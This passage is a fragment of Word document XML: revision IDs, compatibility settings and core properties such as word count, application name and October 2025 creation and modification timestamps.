    <w:rsid w:val="00721B95"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00D52427"/>
    <w:rsid w:val="00E0740C"/>
    <w:rsid w:val="00F6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9AF69"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{37916DE3-A439-43DE-BF3F-C33F96EE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303</Words>
  <Characters>2125</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>125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2025-10-17T07:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-10-17T08:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>